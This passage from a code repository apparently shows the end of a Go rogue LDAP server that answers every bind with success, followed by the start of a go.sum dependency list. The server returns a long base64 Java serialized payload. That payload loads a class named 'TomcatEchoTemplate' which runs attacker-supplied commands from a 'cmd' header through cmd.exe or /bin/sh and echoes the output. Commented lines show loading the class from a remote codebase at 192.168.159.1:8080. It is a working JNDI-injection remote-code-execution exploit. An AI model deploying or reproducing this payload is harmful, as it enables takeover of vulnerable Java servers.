UUlBTFVLQUxZQXR3b0FIUUM0Q0FDNUNBQzZDQUM3Q0FDOENBQzlCd0MrQndDL0NnQXZBTUFLQUM4QXdRb0F3Z0REQ2dBdUFNUUlBTVVLQUM0QXhnb0FMZ0RIQ2dBZEFNZ0tBRXdBeVFvQXRnREtDZ0RMQU13S0FCQUF6UWdBemdvQUdBRFBDZ0FZQU5BSUFORUhBSGdLQUJnQTBnZ0Ewd2NBMUFnQTFRZ0ExZ29BR0FEWEJ3RFlDZ0FZQU5rS0FFY0EyZ29BMndEY0NnRGJBTjBIQU40SEFOOEJBQVk4YVc1cGRENEJBQU1vS1ZZQkFBUkRiMlJsQVFBUFRHbHVaVTUxYldKbGNsUmhZbXhsQVFBU1RHOWpZV3hXWVhKcFlXSnNaVlJoWW14bEFRQUZkbUZ5TVRNQkFCVk1hbUYyWVM5c1lXNW5MMFY0WTJWd2RHbHZianNCQUFWMllYSXhNZ0VBRTF0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBVjJZWEl4TVFFQUVreHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFCSFpoY2pJQkFBVjJZWEl4TUFFQUFVa0JBQVIyWVhJNUFRQVFUR3BoZG1FdmRYUnBiQzlNYVhOME93RUFCSFpoY2pFQkFBUjJZWEl6QVFBU1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUVkbUZ5TndFQUVreHFZWFpoTDJ4aGJtY3ZWR2h5WldGa093RUFCSFpoY2pZQkFBUjJZWEkwQVFBQldnRUFCSFpoY2pVQkFCTmJUR3BoZG1FdmJHRnVaeTlVYUhKbFlXUTdBUUFCWlFFQUJIUm9hWE1CQUM1TVkyOXRMMlpsYVdodmJtY3ZiR1JoY0M5MFpXMXdiR0YwWlM5VWIyMWpZWFJGWTJodlZHVnRjR3hoZEdVN0FRQU5VM1JoWTJ0TllYQlVZV0pzWlFjQTNnY0E0QWNBckFjQXFBY0FuZ2NBb0FjQVZnRUFDWGR5YVhSbFFtOWtlUUVBRnloTWFtRjJZUzlzWVc1bkwwOWlhbVZqZER0YlFpbFdBUUFSVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjenNCQUNGTWFtRjJZUzlzWVc1bkwwNXZVM1ZqYUUxbGRHaHZaRVY0WTJWd2RHbHZianNCQUFSMllYSXdBUUFDVzBJSEFOUUhBS1lCQUFwRmVHTmxjSFJwYjI1ekFRQUZaMlYwUmxZQkFEZ29UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBSUV4cVlYWmhMMnhoYm1jdlRtOVRkV05vUm1sbGJHUkZlR05sY0hScGIyNDdBUUFaVEdwaGRtRXZiR0Z1Wnk5eVpXWnNaV04wTDBacFpXeGtPd2NBNFFjQTJBRUFDWFJ5WVc1elptOXliUUVBY2loTVkyOXRMM04xYmk5dmNtY3ZZWEJoWTJobEwzaGhiR0Z1TDJsdWRHVnlibUZzTDNoemJIUmpMMFJQVFR0YlRHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRiV3d2YVc1MFpYSnVZV3d2YzJWeWFXRnNhWHBsY2k5VFpYSnBZV3hwZW1GMGFXOXVTR0Z1Wkd4bGNqc3BWZ0VBQ0dSdlkzVnRaVzUwQVFBdFRHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRZV3hoYmk5cGJuUmxjbTVoYkM5NGMyeDBZeTlFVDAwN0FRQUlhR0Z1Wkd4bGNuTUJBRUpiVEdOdmJTOXpkVzR2YjNKbkwyRndZV05vWlM5NGJXd3ZhVzUwWlhKdVlXd3ZjMlZ5YVdGc2FYcGxjaTlUWlhKcFlXeHBlbUYwYVc5dVNHRnVaR3hsY2pzSEFPSUJBS1lvVEdOdmJTOXpkVzR2YjNKbkwyRndZV05vWlM5NFlXeGhiaTlwYm5SbGNtNWhiQzk0YzJ4MFl5OUVUMDA3VEdOdmJTOXpkVzR2YjNKbkwyRndZV05vWlM5NGJXd3ZhVzUwWlhKdVlXd3ZaSFJ0TDBSVVRVRjRhWE5KZEdWeVlYUnZjanRNWTI5dEwzTjFiaTl2Y21jdllYQmhZMmhsTDNodGJDOXBiblJsY201aGJDOXpaWEpwWVd4cGVtVnlMMU5sY21saGJHbDZZWFJwYjI1SVlXNWtiR1Z5T3lsV0FRQUlhWFJsY21GMGIzSUJBRFZNWTI5dEwzTjFiaTl2Y21jdllYQmhZMmhsTDNodGJDOXBiblJsY201aGJDOWtkRzB2UkZSTlFYaHBjMGwwWlhKaGRHOXlPd0VBQjJoaGJtUnNaWElCQUVGTVkyOXRMM04xYmk5dmNtY3ZZWEJoWTJobEwzaHRiQzlwYm5SbGNtNWhiQzl6WlhKcFlXeHBlbVZ5TDFObGNtbGhiR2w2WVhScGIyNUlZVzVrYkdWeU93RUFDbE52ZFhKalpVWnBiR1VCQUJkVWIyMWpZWFJGWTJodlZHVnRjR3hoZEdVdWFtRjJZUXdBVGdCUEJ3RGdEQURqQU9RTUFPVUE1Z0VBQjNSb2NtVmhaSE1NQUh3QWZRd0E1d0RvQVFBRVpYaGxZd3dBNlFEcUFRQUVhSFIwY0FFQUJuUmhjbWRsZEFFQUVtcGhkbUV2YkdGdVp5OVNkVzV1WVdKc1pRRUFCblJvYVhNa01BRUFCbWRzYjJKaGJBRUFFMnBoZG1FdmJHRnVaeTlGZUdObGNIUnBiMjRCQUFwd2NtOWpaWE56YjNKekFRQU9hbUYyWVM5MWRHbHNMMHhwYzNRTUFPc0E3QXdBN1FEdUFRQURjbVZ4REFEdkFQQUJBQXRuWlhSU1pYTndiMjV6WlFFQUQycGhkbUV2YkdGdVp5OURiR0Z6Y3d3QThRRHlBUUFRYW1GMllTOXNZVzVuTDA5aWFtVmpkQWNBOHd3QTlBRDFBUUFKWjJWMFNHVmhaR1Z5QVFBUWFtRjJZUzlzWVc1bkwxTjBjbWx1WndFQUNGUmxjM1JsWTJodkRBRDJBUGNCQUFselpYUlRkR0YwZFhNTUFQZ0FkUUVBRVdwaGRtRXZiR0Z1Wnk5SmJuUmxaMlZ5REFCT0FQa0JBQWxoWkdSSVpXRmtaWElCQUFOamJXUUJBQWR2Y3k1dVlXMWxCd0Q2REFEN0FQd01BUDBBNkFFQUJuZHBibVJ2ZHdFQUIyTnRaQzVsZUdVQkFBSXZZd0VBQnk5aWFXNHZjMmdCQUFJdFl3RUFFV3BoZG1FdmRYUnBiQzlUWTJGdWJtVnlBUUFZYW1GMllTOXNZVzVuTDFCeWIyTmxjM05DZFdsc1pHVnlEQUJPQVA0TUFQOEJBQWNCQVF3QkFnRUREQUJPQVFRQkFBSmNRUXdCQlFFR0RBRUhBT2dNQVFnQkNRd0Fjd0IwREFFS0FRc0hBUXdNQVEwQTZBd0JEZ0JQQVFBa2IzSm5MbUZ3WVdOb1pTNTBiMjFqWVhRdWRYUnBiQzVpZFdZdVFubDBaVU5vZFc1ckRBRVBBUkFNQVJFQkVnRUFDSE5sZEVKNWRHVnpEQUVUQVBJQkFBZGtiMWR5YVhSbEFRQWZhbUYyWVM5c1lXNW5MMDV2VTNWamFFMWxkR2h2WkVWNFkyVndkR2x2YmdFQUUycGhkbUV1Ym1sdkxrSjVkR1ZDZFdabVpYSUJBQVIzY21Gd0RBRVVBUlVCQUI1cVlYWmhMMnhoYm1jdlRtOVRkV05vUm1sbGJHUkZlR05sY0hScGIyNE1BUllBOEF3QVRnRVhCd0RoREFFWUFSa01BTzBCR2dFQUxHTnZiUzltWldsb2IyNW5MMnhrWVhBdmRHVnRjR3hoZEdVdlZHOXRZMkYwUldOb2IxUmxiWEJzWVhSbEFRQkFZMjl0TDNOMWJpOXZjbWN2WVhCaFkyaGxMM2hoYkdGdUwybHVkR1Z5Ym1Gc0wzaHpiSFJqTDNKMWJuUnBiV1V2UVdKemRISmhZM1JVY21GdWMyeGxkQUVBRUdwaGRtRXZiR0Z1Wnk5VWFISmxZV1FCQUJkcVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5R2FXVnNaQUVBT1dOdmJTOXpkVzR2YjNKbkwyRndZV05vWlM5NFlXeGhiaTlwYm5SbGNtNWhiQzk0YzJ4MFl5OVVjbUZ1YzJ4bGRFVjRZMlZ3ZEdsdmJnRUFEV04xY25KbGJuUlVhSEpsWVdRQkFCUW9LVXhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd0VBRG1kbGRGUm9jbVZoWkVkeWIzVndBUUFaS0NsTWFtRjJZUzlzWVc1bkwxUm9jbVZoWkVkeWIzVndPd0VBQjJkbGRFNWhiV1VCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFDR052Ym5SaGFXNXpBUUFiS0V4cVlYWmhMMnhoYm1jdlEyaGhjbE5sY1hWbGJtTmxPeWxhQVFBRWMybDZaUUVBQXlncFNRRUFBMmRsZEFFQUZTaEpLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFTnNZWE56QVFBVEtDbE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFDV2RsZEUxbGRHaHZaQUVBUUNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1Wnp0YlRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkRzQkFCaHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOU5aWFJvYjJRQkFBWnBiblp2YTJVQkFEa29UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdXMHhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFkcGMwVnRjSFI1QVFBREtDbGFBUUFFVkZsUVJRRUFCQ2hKS1ZZQkFCQnFZWFpoTDJ4aGJtY3ZVM2x6ZEdWdEFRQUxaMlYwVUhKdmNHVnlkSGtCQUNZb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tVeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFDM1J2VEc5M1pYSkRZWE5sQVFBV0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BWZ0VBQlhOMFlYSjBBUUFWS0NsTWFtRjJZUzlzWVc1bkwxQnliMk5sYzNNN0FRQVJhbUYyWVM5c1lXNW5MMUJ5YjJObGMzTUJBQTVuWlhSSmJuQjFkRk4wY21WaGJRRUFGeWdwVEdwaGRtRXZhVzh2U1c1d2RYUlRkSEpsWVcwN0FRQVlLRXhxWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0T3lsV0FRQU1kWE5sUkdWc2FXMXBkR1Z5QVFBbktFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1hbUYyWVM5MWRHbHNMMU5qWVc1dVpYSTdBUUFFYm1WNGRBRUFDR2RsZEVKNWRHVnpBUUFFS0NsYlFnRUFEV2RsZEZCeWIzQmxjblJwWlhNQkFCZ29LVXhxWVhaaEwzVjBhV3d2VUhKdmNHVnlkR2xsY3pzQkFCUnFZWFpoTDNWMGFXd3ZVSEp2Y0dWeWRHbGxjd0VBQ0hSdlUzUnlhVzVuQVFBUGNISnBiblJUZEdGamExUnlZV05sQVFBSFptOXlUbUZ0WlFFQUpTaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQXR1WlhkSmJuTjBZVzVqWlFFQUZDZ3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFSWjJWMFJHVmpiR0Z5WldSTlpYUm9iMlFCQUJCblpYUkVaV05zWVhKbFpFWnBaV3hrQVFBdEtFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1hbUYyWVM5c1lXNW5MM0psWm14bFkzUXZSbWxsYkdRN0FRQU5aMlYwVTNWd1pYSmpiR0Z6Y3dFQUZTaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BWZ0VBRFhObGRFRmpZMlZ6YzJsaWJHVUJBQVFvV2lsV0FRQW1LRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNBSVFCTUFFMEFBQUFBQUFVQUFRQk9BRThBQVFCUUFBQUVFZ0FJQUF3QUFBSklLcmNBQVFNOHVBQUN0Z0FERWdTNEFBWEFBQWJBQUFaTkF6NGRMTDZpQWlJc0hUSTZCQmtFeGdJU0dRUzJBQWM2QlJrRkVnaTJBQW1hQWdFWkJSSUt0Z0FKbVFIM0dRUVNDN2dBQlRvR0dRYkJBQXlaQWVZWkJoSU51QUFGRWc2NEFBVVNEN2dBQlRvR3B3QUlPZ2VuQWNzWkJoSVJ1QUFGd0FBU09nY0ROZ2dWQ0JrSHVRQVRBUUNpQWFrWkJ4VUl1UUFVQWdBNkNSa0pFaFc0QUFVNkJoa0d0Z0FXRWhjRHZRQVl0Z0FaR1FZRHZRQWF0Z0FiT2dvWkJyWUFGaEljQkwwQUdGa0RFaDFUdGdBWkdRWUV2UUFhV1FNU0hsTzJBQnZBQUIwNkJSa0Z4Z0JrR1FXMkFCK2FBRndaQ3JZQUZoSWdCTDBBR0ZrRHNnQWhVN1lBR1JrS0JMMEFHbGtEdXdBaVdSRUF5TGNBSTFPMkFCdFhHUXEyQUJZU0pBVzlBQmhaQXhJZFUxa0VFaDFUdGdBWkdRb0Z2UUFhV1FNU0hsTlpCQmtGVTdZQUcxY0VQQmtHdGdBV0Vod0V2UUFZV1FNU0hWTzJBQmtaQmdTOUFCcFpBeElsVTdZQUc4QUFIVG9GR1FYR0FKa1pCYllBSDVvQWtSa0t0Z0FXRWlBRXZRQVlXUU95QUNGVHRnQVpHUW9FdlFBYVdRTzdBQ0paRVFESXR3QWpVN1lBRzFjU0pyZ0FKN1lBS0JJcHRnQUptUUFaQnIwQUhWa0RFaXBUV1FRU0sxTlpCUmtGVTZjQUZnYTlBQjFaQXhJc1Uxa0VFaTFUV1FVWkJWTTZDeGtLdXdBdVdic0FMMWtaQzdjQU1MWUFNYllBTXJjQU14STB0Z0ExdGdBMnRnQTN1QUE0QkR3WkJjWUFDeGtGdGdBZm1RQVZHNWtBRVJrS3VBQTV0Z0E2dGdBM3VBQTRHNWtBQnFjQUNZUUlBYWYrVVJ1WkFBYW5BQW1FQXdHbi9kNm5BQWhNSzdZQU83RUFBZ0JXQUdrQWJBQVFBQVFDUHdKQ0FCQUFBd0JSQUFBQXFnQXFBQUFBRGdBRUFCQUFCZ0FSQUJnQUV3QWdBQlFBSlFBVkFDb0FGZ0F4QUJjQVJRQVlBRTRBR1FCV0FCc0FhUUFlQUd3QUhBQnVBQjBBY1FBZ0FIMEFJZ0NNQUNNQWx3QWtBS0FBSlFDNUFDWUEzd0FuQU93QUtBRVhBQ2tCUXdBcUFVVUFMUUZyQUM0QmVBQXZBYU1BTUFIZUFERUNCQUF5QWdZQU5RSVhBRFlDSlFBNUFpa0FPZ0lzQUNJQ01nQStBallBUHdJNUFCTUNQd0JIQWtJQVJRSkRBRVlDUndCSUFGSUFBQUNPQUE0QWJnQURBRk1BVkFBSEFkNEFLQUJWQUZZQUN3Q1hBWlVBVndCWUFBa0F1UUZ6QUZrQVdBQUtBSUFCc2dCYUFGc0FDQUI5QWJ3QVhBQmRBQWNBVGdIckFGNEFXQUFHQURFQ0NBQmZBR0FBQlFBbEFoUUFZUUJpQUFRQUdnSWxBR01BV3dBREFBWUNPUUJrQUdVQUFRQVlBaWNBWmdCbkFBSUNRd0FFQUdnQVZBQUJBQUFDU0FCcEFHb0FBQUJyQUFBQVpBQVEvd0FhQUFRSEFHd0JCd0FHQVFBQS93QlJBQWNIQUd3QkJ3QUdBUWNBYlFjQWJnY0Fid0FCQndCd0JQMEFEZ2NBY1FIOUFNUUhBRzhIQUcvN0FJTlNCd0J5S1F3UitRQUcrZ0FGL3dBR0FBUUhBR3dCQndBR0FRQUErQUFGUWdjQWNBUUFDZ0J6QUhRQUFnQlFBQUFCVndBSUFBVUFBQUN1RWp5NEFEMU9MYllBUGswdEVqOEd2UUFZV1FNU1FGTlpCTElBSVZOWkJiSUFJVk8yQUVFc0JyMEFHbGtESzFOWkJMc0FJbGtEdHdBalUxa0Z1d0FpV1N1K3R3QWpVN1lBRzFjcXRnQVdFa0lFdlFBWVdRTXRVN1lBR1NvRXZRQWFXUU1zVTdZQUcxZW5BRVU2QkJKRXVBQTlUaTBTUlFTOUFCaFpBeEpBVTdZQVFTMEV2UUFhV1FNclU3WUFHMDBxdGdBV0VrSUV2UUFZV1FNdFU3WUFHU29FdlFBYVdRTXNVN1lBRzFleEFBRUFBQUJvQUdzQVF3QURBRkVBQUFBcUFBb0FBQUJPQUFZQVR3QUxBRkFBU2dCUkFHZ0FWZ0JyQUZJQWJRQlRBSE1BVkFDUEFGVUFyUUJZQUZJQUFBQklBQWNBQ3dCZ0FGa0FXQUFDQUFZQVpRQmZBSFVBQXdCdEFFQUFaZ0IyQUFRQUFBQ3VBSGNBV0FBQUFBQUFyZ0JlQUhnQUFRQ1BBQjhBV1FCWUFBSUFjd0E3QUY4QWRRQURBR3NBQUFBUkFBTDNBR3NIQUhuOUFFRUhBRzhIQUhvQWV3QUFBQVFBQVFBUUFBb0FmQUI5QUFJQVVBQUFBTlVBQXdBRkFBQUFPQUZOS3JZQUZrNHRFaHFsQUJZdEs3WUFSazJuQUEwNkJDMjJBRWhPcC8vcUxNY0FETHNBUjFrcnR3Qkp2eXdFdGdCS0xDcTJBRXV3QUFFQURRQVRBQllBUndBREFGRUFBQUF5QUF3QUFBQmJBQUlBWEFBSEFGNEFEUUJnQUJNQVlRQVdBR0lBR0FCakFCMEFaQUFnQUdjQUpBQm9BQzBBYWdBeUFHc0FVZ0FBQURRQUJRQVlBQVVBWmdCK0FBUUFBQUE0QUhjQVdBQUFBQUFBT0FCZUFHQUFBUUFDQURZQVdRQi9BQUlBQndBeEFGOEFkUUFEQUdzQUFBQVJBQVQ5QUFjSEFJQUhBSHBPQndDQkNRd0Fld0FBQUFRQUFRQVFBQUVBZ2dDREFBSUFVQUFBQUQ4QUFBQURBQUFBQWJFQUFBQUNBRkVBQUFBR0FBRUFBQUJ5QUZJQUFBQWdBQU1BQUFBQkFHa0FhZ0FBQUFBQUFRQ0VBSVVBQVFBQUFBRUFoZ0NIQUFJQWV3QUFBQVFBQVFDSUFBRUFnZ0NKQUFJQVVBQUFBRWtBQUFBRUFBQUFBYkVBQUFBQ0FGRUFBQUFHQUFFQUFBQjNBRklBQUFBcUFBUUFBQUFCQUdrQWFnQUFBQUFBQVFDRUFJVUFBUUFBQUFFQWlnQ0xBQUlBQUFBQkFJd0FqUUFEQUhzQUFBQUVBQUVBaUFBQkFJNEFBQUFDQUk4PScpOwp2YXIgY2xhc3NMb2FkZXIgPSBqYXZhLmxhbmcuVGhyZWFkLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKTsKdHJ5ewogICB2YXIgY2xhenogPSBjbGFzc0xvYWRlci5sb2FkQ2xhc3MoJ2NvbS5mZWlob25nLmxkYXAudGVtcGxhdGUuVG9tY2F0RWNob1RlbXBsYXRlJyk7CiAgIGNsYXp6Lm5ld0luc3RhbmNlKCk7Cn1jYXRjaChlcnIpewogICB2YXIgbWV0aG9kID0gamF2YS5sYW5nLkNsYXNzTG9hZGVyLmNsYXNzLmdldERlY2xhcmVkTWV0aG9kKCdkZWZpbmVDbGFzcycsICcnLmdldEJ5dGVzKCkuZ2V0Q2xhc3MoKSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSk7CiAgIG1ldGhvZC5zZXRBY2Nlc3NpYmxlKHRydWUpOwogICB2YXIgY2xhenogPSBtZXRob2QuaW52b2tlKGNsYXNzTG9hZGVyLCBieXRlcywgMCwgYnl0ZXMubGVuZ3RoKTsKICAgY2xhenoubmV3SW5zdGFuY2UoKTsKfTsiKX1wcHBwcHh0ACVvcmcuYXBhY2hlLm5hbWluZy5mYWN0b3J5LkJlYW5GYWN0b3J5cHQAFGphdmF4LmVsLkVMUHJvY2Vzc29y") 40 | e.AddAttribute("javaClassName", "foo") 41 | e.AddAttribute("javaSerializedData", message.AttributeValue(payload)) 42 | w.Write(e) 43 | 44 | res := ldap.NewSearchResultDoneResponse(ldap.LDAPResultSuccess) 45 | w.Write(res) 46 | // q.Done() 47 | } else { 48 | fmt.Println("[-] Ldap request err,exited.") 49 | // q.Done() 50 | } 51 | 52 | } 53 | 54 | // handleBind return Success for any login/pass 55 | func handleBind(w ldap.ResponseWriter, m *ldap.Message) { 56 | res := ldap.NewBindResponse(ldap.LDAPResultSuccess) 57 | w.Write(res) 58 | return 59 | } 60 | 61 | // e.AddAttribute("objectClass", "javaNamingReference") 62 | // e.AddAttribute("javaCodebase", "http://192.168.159.1:8080/") 63 | // e.AddAttribute("JavaFactory", "TomcatEchoTemplate") 64 | // e.AddAttribute("javaClassName", "TomcatEchoTemplate") 65 | // w.Write(e) 66 | // res := ldap.NewSearchResultDoneResponse(ldap.LDAPResultSuccess) 67 | // w.Write(res) 68 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= 2 | cloud.google.com/go v0.31.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= 3 | cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= 4 | cloud.google.com/go v0.37.0/go.mod h1:TS1dMSSfndXH133OKGwekG838Om/cQT0BUHV3HcBgoo= 5 | dmitri.shuralyov.com/app/changes v0.0.0-20180602232624-0a106ad413e3/go.mod h1:Yl+fi1br7+Rr3LqpNJf1/uxUdtRUV+Tnj0o93V2B9MU= 6 | dmitri.shuralyov.com/html/belt v0.0.0-20180602232347-f7d459c86be0/go.mod h1:JLBrvjyP0v+ecvNYvCpyZgu5/xkfAUhi6wJj28eUfSU= 7 | dmitri.shuralyov.com/service/change v0.0.0-20181023043359-a85b471d5412/go.mod h1:a1inKt/atXimZ4Mv927x+r7UpyzRUf4emIoiiSC2TN4= 8 | dmitri.shuralyov.com/state v0.0.0-20180228185332-28bcc343414c/go.mod h1:0PRwlb0D6DFvNNtx+9ybjezNCa8XF0xaYcETyp6rHWU= 9 | git.apache.org/thrift.git v0.0.0-20180902110319-2566ecd5d999/go.mod h1:fPE2ZNJGynbRyZ4dJvy6G277gSllfV2HJqblrnkyeyg= 10 | github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= 11 | github.com/andybalholm/brotli v1.0.6 h1:Yf9fFpf49Zrxb9NlQaluyE92/+X7UVHlhMNJN2sxfOI= 12 | github.com/andybalholm/brotli v1.0.6/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= 13 | github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239/go.mod h1:2FmKhYUyUczH0OGQWaF5ceTx0UBShxjsH6f8oGKYe2c= 14 | github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= 15 | github.com/bradfitz/go-smtpd v0.0.0-20170404230938-deb6d6237625/go.mod h1:HYsPBTaaSFSlLx/70C2HPIMNZpVV8+vt/A+FMnYP11g= 16 | github.com/buger/jsonparser v0.0.0-20181115193947-bf1c66bbce23/go.mod h1:bbYlZJ7hK1yFx9hf58LP0zeX7UjIGs20ufpu3evjr+s= 17 | github.com/cheekybits/genny v1.0.0 h1:uGGa4nei+j20rOSeDeP5Of12XVm7TGUd4dJA9RDitfE= 18 | github.com/cheekybits/genny v1.0.0/go.mod h1:+tQajlRqAUrPI7DOSpB0XAqZYtQakVtB7wXkRAgjxjQ= 19 | github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= 20 | github.com/cloudflare/circl v1.3.6 h1:/xbKIqSHbZXHwkhbrhrt2YOHIwYJlXH94E3tI/gDlUg= 21 | github.com/cloudflare/circl v1.3.6/go.mod h1:5XYMA4rFBvNIrhs50XuiBJ15vF2pZn4nnUKZrLbUZFA= 22 | github.com/coreos/go-systemd v0.0.0-20181012123002-c6f51f82210d/go.mod h1:F5haX7vjVVG0kc13fIWeqUViNPyEJxv/OmvnBo0Yme4= 23 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 24 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 25 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 26 | github.com/dustin/go-humanize v1.0.0/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk= 27 | github.com/flynn/go-shlex v0.0.0-20150515145356-3f9db97f8568/go.mod h1:xEzjJPgXI435gkrCt3MPfRiAkVrwSbHsst4LCFVfpJc= 28 | github.com/francoispqt/gojay v1.2.13/go.mod h1:ehT5mTG4ua4581f1++1WLG0vPdaA9HaiDsoyrBGkyDY= 29 | github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo= 30 | github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ= 31 | github.com/fsnotify/fsnotify v1.5.4 h1:jRbGcIw6P2Meqdwuo0H1p6JVLbL5DHKAKlYndzMwVZI= 32 | github.com/fsnotify/fsnotify v1.5.4/go.mod h1:OVB6XrOHzAwXMpEM7uPOzcehqUV2UqJxmVXmkdnm1bU= 33 | github.com/fsnotify/fsnotify v1.6.0/go.mod h1:sl3t1tCWJFWoRz9R8WJCbQihKKwmorjAbSClcnxKAGw= 34 | github.com/fsnotify/fsnotify v1.7.0 h1:8JEhPFa5W2WU7YfeZzPNqzMP6Lwt7L2715Ggo0nosvA= 35 | github.com/fsnotify/fsnotify v1.7.0/go.mod h1:40Bi/Hjc2AVfZrqy+aj+yEI+/bRxZnMJyTJwOpGvigM= 36 | github.com/gaukas/godicttls v0.0.4 h1:NlRaXb3J6hAnTmWdsEKb9bcSBD6BvcIjdGdeb0zfXbk= 37 | github.com/gaukas/godicttls v0.0.4/go.mod h1:l6EenT4TLWgTdwslVb4sEMOCf7Bv0JAK67deKr9/NCI= 38 | github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= 39 | github.com/gliderlabs/ssh v0.1.1/go.mod h1:U7qILu1NlMHj9FlMhZLlkCdDnU1DBEAqr0aevW3Awn0= 40 | github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q= 41 | github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY= 42 | github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I= 43 | github.com/go-resty/resty/v2 v2.10.0 h1:Qla4W/+TMmv0fOeeRqzEpXPLfTUnR5HZ1+lGs+CkiCo= 44 | github.com/go-resty/resty/v2 v2.10.0/go.mod h1:iiP/OpA0CkcL3IGt1O0+/SIItFUbkkyw5BGXiVdTu+A= 45 | github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0 h1:p104kn46Q8WdvHunIJ9dAyjPVtrBPhSr3KT2yUst43I= 46 | github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0/go.mod h1:fyg7847qk6SyHyPtNmDHnmrv/HOrqktSC+C9fM+CJOE= 47 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 h1:tfuBGBXKqDEevZMzYi5KSi8KkcZtzBcTgAUUtapy0OI= 48 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572/go.mod h1:9Pwr4B2jHnOSGXyyzV8ROjYa2ojvAY6HCGYYfMoC3Ls= 49 | github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ= 50 | github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= 51 | github.com/golang/lint v0.0.0-20180702182130-06c8688daad7/go.mod h1:tluoj9z5200jBnyusfRPU2LqT6J+DAorxEvtC7LHB+E= 52 | github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= 53 | github.com/golang/mock v1.2.0/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= 54 | github.com/golang/mock v1.4.4/go.mod h1:l3mdAwkq5BuhzHwde/uurv3sEJeZMXNpwsxVWU71h+4= 55 | github.com/golang/mock v1.6.0 h1:ErTB+efbowRARo13NNdxyJji2egdxLGQhRaY+DUumQc= 56 | github.com/golang/mock v1.6.0/go.mod 